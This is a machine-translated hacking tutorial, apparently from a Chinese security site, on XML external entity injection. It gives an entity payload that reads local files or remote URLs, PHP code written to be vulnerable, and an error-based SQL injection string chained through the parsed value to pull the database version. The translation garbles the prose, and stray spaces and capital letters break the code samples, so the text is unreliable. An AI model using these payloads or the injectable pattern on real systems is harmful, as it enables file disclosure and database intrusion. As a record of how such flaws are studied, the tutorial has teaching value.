Xml Entity injection and divergent thinking

 

/*
* Author: cfking
* Team: 90sec.org
*/

I have read an article about entity injection of 80sec: www.2cto.com/Article/201111/109868.html.

 

First, I created an XML file.
<? Xml version = "1.0" encoding = "UTF-8" standalone = "yes"?>
<! DOCTYPE copyright [
<! ELEMENT copyright (# PCDATA)>
<! ENTITY hi80sec SYSTEM "file: // C:/wamp/www/2.php">
]>
<Wooyun version = "2.0">
<Whitehats>
& Hi80sec;
</Whitehats>
</Wooyun>

File: // C:/wamp/www/2.php This is the file in my local directory. Use system to reference external resources, that is, the local 2. php file.
The content is
This is a Test
Then create a php code to parse the XML file as follows:
// Test. php
<? Php
$ Xml = simplexml_load_file ("1.xml ");
Foreach ($ xml-> children () as $ child)
{
Echo "<span style = \" color: red; \ ">". $ child. "</span> ";
}
?>
Result 1:

Finally, let's modify the xml file content and call http://www.90sec.org/content. Figure 2:

It turns out that the program reports an error, but we can still find that the program has read the content on the www.90sec.org page. It may be due to the parsing error! There is no way to make small dishes insufficient.
As a result, we can find that we can control a lot of things through this vulnerability.
OK, let's think differently.
For example, if the $ child variable is included in SQL, we can control the content of the file C:/wamp/www/2. php to achieve the injection effect.
Test start:
After we add the database connection and operation code to test. php
<? Php
$ Conn = mysql_connect ("localhost", "root", "") or die ("database connection failed ");
$ Db = mysql_select_db ("test") or die ("the database is not found and may be incorrect ");
$ Xml = simplexml_load_file ("1.xml ");
Foreach ($ xml-> children () as $ child)
{
Echo "<span style = \" color: red; \ ">". $ child. "</span> ";
$ Inssql = "insert into test (name) values ('$ child ')";
$ OK = mysql_query ($ inssql, $ conn) or die (mysql_error ());
If ($ OK ){
Echo "execution successful this SQL statement is: }
}
?>
To help me print out SQL statements and detailed information after an error.
2. php content is still This is a Test

Database Structure:
Create table if not exists 'test '(
'Name' varchar (255) NOT NULL
) ENGINE = InnoDB default charset = latin1;
After accessing test. php, the result is shown in Figure 3:

Then let's modify the 2. php content.
(Select 1 from (select count (*), concat (floor (rand (0) * 2), (select version () a from information_schema.tables group by a) B) ')#
4 after access:

If the SQL statement is not constructed, an error is returned. However, it is sufficient to prove the injection vulnerability caused by the $ child variable being introduced into SQL.
So let's think about other ideas. What if it's eval code execution or include? However, this vulnerability causes a lot of harm in the future.
And php magic quotes have no influence on him!
In addition, as mentioned earlier, I call the http://www.90sec.org/to cause an error. It should be the HTML code of the home page that causes an xml parsing error. We can also successfully call remote resources by replacing a txt file or a file that outputs plain text!
For example:
I will create another 1.txt file and put it into the content.
Remote Test
// Note that the file content encoding is the same as the XML content encoding.
Then, set <! ENTITY hi80sec SYSTEM "file: // C:/wamp/www/2. php"> changed to <! ENTITY hi80sec SYSTEM "http: // localhost/1.txt">
Then access test. php result 5.

Supplement:
When an external resource is called, an \ n is added at the beginning and end of the content.
Parse the Code mentioned above in xml. It only obtains the text value in the content element of the xml file!
Remember that other elements can also be constructed. We can conclude that:
Through this vulnerability, any process of bringing xml parsed values into the function may cause security risks.